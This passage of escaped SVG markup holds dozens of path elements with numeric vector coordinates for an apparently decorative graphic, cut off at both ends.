d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path 